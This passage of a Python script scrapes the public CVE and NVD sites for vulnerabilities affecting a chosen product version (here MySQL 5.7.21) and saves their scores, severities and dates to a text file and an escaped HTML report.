威胁等级 18 | cve_score = '' # 威胁评分 19 | cve_cna = '' # 漏洞分配的机构 20 | 21 | def show(self): 22 | """ 23 | Show basic vul information 24 | :return: None 25 | """ 26 | print('----------------------------------') 27 | print('编号:', self.cve_no) 28 | print('漏洞地址:', self.cve_url) 29 | print('漏洞描述:', self.cve_description[:10]) 30 | print('创建时间:', self.cve_create_time) 31 | print('修改时间:', self.cve_modify_time) 32 | print('CNA:', self.cve_cna) 33 | print('漏洞等级:', self.cve_level) 34 | print('漏洞评分:', self.cve_score) 35 | print('\n\n') 36 | 37 | 38 | # cve search url 39 | search_url = 'https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=' 40 | 41 | headers = { 42 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0' 43 | } 44 | 
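# Map NVD severity labels to the Chinese labels used in the report
level_dict = {
    'CRITICAL': '严重',
    'HIGH': '高',
    'MEDIUM': '中',
    'LOW': '低'
}

cve_obj_list = []   # cve obj-s fill with detailed information
cve_all = []        # cve no-s fetched from nvd

# for query information, need to provide : producer, software, banner
producer = 'oracle'
software = 'mysql'
banner = '5.7.21'


def _texts_after_marker(marker, page):
    """
    Return the text that directly follows every ``"<marker>">`` occurrence in page
    :param marker: regex fragment matching the quoted attribute value to look for
    :param page: page source to search
    :return: list of captured strings, whitespace-stripped, in page order
    """
    # Stop at the next tag: the former '(.*)?' group was greedy to the end of
    # the line, so any markup after the value on that line was captured too.
    pattern = r'"{}">([^<]*)'.format(marker)
    return [text.strip() for text in re.findall(pattern, page)]


def fill_with_cve(cve, cve_obj):
    """
    Fetch detailed information by search cve to fill cve_obj that can be fetch from CVE
    :param cve: cve no
    :param cve_obj: cve object to fill
    :return: None
    """
    # construct cve url
    cve_url = 'https://cve.mitre.org/cgi-bin/cvename.cgi?name='
    url = '{}{}'.format(cve_url, cve)

    # fill cve obj with cve_no & cve_url
    cve_obj.cve_no = cve
    cve_obj.cve_url = url

    try:
        response = requests.get(url=url, timeout=15, headers=headers)
        soup = BeautifulSoup(response.text, features="lxml")

        # rows of the generated table; the positions below depend on the page layout
        rows = soup.select('body > div#Page > div#CenterPane > div#GeneratedTable > table > tr')

        # to get cve description or detail information
        cve_obj.cve_description = rows[3].td.string

        # to get cve create time (page shows it as YYYYMMDD)
        bold_cells = soup.select('body > div#Page > div#CenterPane > div#GeneratedTable > table > tr > td > b')
        created = bold_cells[1].string
        cve_obj.cve_create_time = '{}-{}-{}'.format(created[:4], created[4:6], created[6:])

        # to get assigning cna
        cve_obj.cve_cna = rows[8].td.string
    except Exception as exc:
        # Exception rather than a bare except, so Ctrl-C still stops a long run.
        print('something bad happen when searching cve...', cve, exc)


def fill_with_nvd(cve, cve_obj):
    """
    Fetch detailed information by search cve to fill cve_obj that can be fetch from NVD
    :param cve: cve no
    :param cve_obj: cve object to fill
    :return: None
    """
    nvd_url = 'https://nvd.nist.gov/vuln/detail/'
    url = '{}{}'.format(nvd_url, cve)
    cve_obj.cve_nvd_url = url

    try:
        response = requests.get(url, headers=headers, timeout=60)
        if response.status_code != 200:
            return
        page = response.text

        # to get modified time (page shows it as MM/DD/YYYY)
        modified = _texts_after_marker('vuln-description-last-modified', page)[0]
        month, day, year = modified.split('/')
        cve_obj.cve_modify_time = '{}-{}-{}'.format(year, month, day)

        # to get vul score, preferring CVSS v3 and falling back to v2
        scores = (_texts_after_marker('vuln-cvssv3-base-score', page)
                  or _texts_after_marker('vuln-cvssv2-base-score', page))
        cve_obj.cve_score = scores[0]

        # to get vul level, same v3-then-v2 order
        severities = (_texts_after_marker('vuln-cvssv3-base-score-severity', page)
                      or _texts_after_marker('vuln-cvssv2-base-score-severity', page))
        # an unmapped label is kept as-is instead of aborting the whole record
        cve_obj.cve_level = level_dict.get(severities[0], severities[0])
    except Exception as exc:
        print('something bad happen when searching nvd...', cve, exc)


def fetch_all_cves():
    """
    Query NVD to get specific version of software vulnerabilities
    :return: None
    """
    # construct query string
    if banner:
        keyword = '{}%3a{}'.format(software, banner)
    else:
        keyword = software
    base_url = 'https://nvd.nist.gov/vuln/search/results?form_type=Advanced&' \
               'cves=on&cpe_version=cpe%3a%2fa%3a{}%3a{}'.format(producer, keyword)
    print(base_url)

    # to get cve number; stays 0 when the request or the parse fails, so the
    # paging loop below is skipped instead of hitting an unbound name
    total = 0
    try:
        response = requests.get(base_url, timeout=60, headers=headers)
        if response.status_code == 200:
            count_text = _texts_after_marker('vuln-matching-records-count', response.text)[0]
            total = int(count_text.replace(',', ''))
            msg = 'There are {} cves with {} {}...'.format(total, software, banner)
            print(msg)
    except Exception as exc:
        print('could not read the matching-records count from nvd:', exc)

    # fetch all cve no, 20 results per page
    page_size = 20
    pages = math.ceil(total / page_size)
    for index in range(pages):
        url = '{}&startIndex={}'.format(base_url, index * page_size)
        msg = 'processing page {}/{}...'.format(index + 1, pages)
        print(msg)
        try:
            response = requests.get(url, timeout=60, headers=headers)
            if response.status_code == 200:
                cve_all.extend(_texts_after_marker(r'vuln-detail-link-\d+', response.text))
        except Exception as exc:
            print('could not fetch result page {}:'.format(index + 1), exc)
    print('\n-------- CVEs ---------\n')
    for line in cve_all:
        print(line)
    print()


def fetch_vul_info():
    """
    Collect every CVE number, then fill one CveObject per CVE from CVE and NVD
    :return: None
    """
    # get all cves
    fetch_all_cves()

    for position, cve in enumerate(cve_all, 1):
        cve_obj = CveObject()
        msg = '[{}/{}] Fetching {} ...'.format(position, len(cve_all), cve)
        print(msg)
        # fill cve object with information from cve and nvd
        fill_with_cve(cve, cve_obj)
        fill_with_nvd(cve, cve_obj)
        cve_obj_list.append(cve_obj)


def save_cve_objs():
    """
    Save cve info to a file, one '|'-separated record per line
    :return: None
    """
    def one_line(value):
        # scraped text may contain line breaks; keep each record on one line
        return ' '.join(str(value).splitlines())

    # utf-8 is explicit because the level column holds Chinese labels
    with open('cve.txt', 'a', encoding='utf-8') as fw:
        for obj in cve_obj_list:
            fields = (obj.cve_no, obj.cve_url, obj.cve_nvd_url,
                      obj.cve_score, obj.cve_level, obj.cve_cna,
                      obj.cve_create_time, obj.cve_modify_time, obj.cve_description)
            fw.write('|'.join(one_line(field) for field in fields) + '\n')


def write2html():
    """
    Write the collected cve info into cve.html
    Every value placed in the page is HTML-escaped: ids, descriptions and CNA
    names are scraped from remote pages and must not be emitted as markup.
    :return: None
    """
    import html as html_lib  # local import: `html` was also a local name here

    def esc(value):
        return html_lib.escape(str(value), quote=True)

    print('write data to html')

    # NOTE(review): only the templates' visible text and the order of their
    # format slots could be read from the listing under review; the tags below
    # are a plain reconstruction. Restore the project's own class names,
    # stylesheet hooks and footer script before relying on the styling.
    parts = [
        '<!DOCTYPE html>'
        '<html>'
        '<head>'
        '<meta charset="utf-8">'
        '<title>CVEs</title>'
        '</head>'
        '<body>'
        '<h1>CVEs for {} {}</h1>'.format(esc(software), esc(banner)),
        '<h2>漏洞列表</h2>',
    ]

    # index of all CVEs with their level
    for obj in cve_obj_list:
        parts.append('<a href="#{}">{}</a>&nbsp;&nbsp;&nbsp;&nbsp;{}<br>'.format(
            esc(obj.cve_no), esc(obj.cve_no), esc(obj.cve_level)))

    # per-level totals; levels outside the four known labels are not tabulated
    tally = {'严重': 0, '高': 0, '中': 0, '低': 0}
    for obj in cve_obj_list:
        if obj.cve_level in tally:
            tally[obj.cve_level] += 1
    parts.append(
        '<table>'
        '<tr><th>等级</th><th>严重</th><th>高危</th><th>中危</th><th>低危</th></tr>'
        '<tr><th>个数({})</th><td>{}</td><td>{}</td><td>{}</td><td>{}</td></tr>'
        '</table>'.format(len(cve_obj_list), tally['严重'], tally['高'], tally['中'], tally['低']))

    detail = (
        '<table id="{}">'
        '<tr><th>漏洞编号</th><td>{}</td></tr>'
        '<tr><th>威胁评分</th><td>{}</td></tr>'
        '<tr><th>风险等级</th><td>{}</td></tr>'
        '<tr><th>发现时间</th><td>{}</td></tr>'
        '<tr><th>修改时间</th><td>{}</td></tr>'
        '</table>'
        '<h3>Assigning CNA</h3><p>{}</p>'
        '<h3>漏洞描述</h3><p>{}</p>'
        '<h3>参考链接</h3>'
        '<p><a href="{}">{}</a><br><a href="{}">{}</a></p>'
    )
    for obj in cve_obj_list:
        parts.append(detail.format(
            esc(obj.cve_no), esc(obj.cve_no), esc(obj.cve_score), esc(obj.cve_level),
            esc(obj.cve_create_time), esc(obj.cve_modify_time), esc(obj.cve_cna),
            esc(obj.cve_description),
            esc(obj.cve_url), esc(obj.cve_url),
            esc(obj.cve_nvd_url), esc(obj.cve_nvd_url)))

    parts.append('</body></html>')
    document = ''.join(parts)

    # write to cve html file for showing results
    with open('cve.html', 'w', encoding='utf-8') as fw:
        fw.write(document)


if __name__ == '__main__':
    # the query target is set by producer / software / banner above
    fetch_vul_info()
    for obj in cve_obj_list:
        obj.show()
    write2html()
    save_cve_objs()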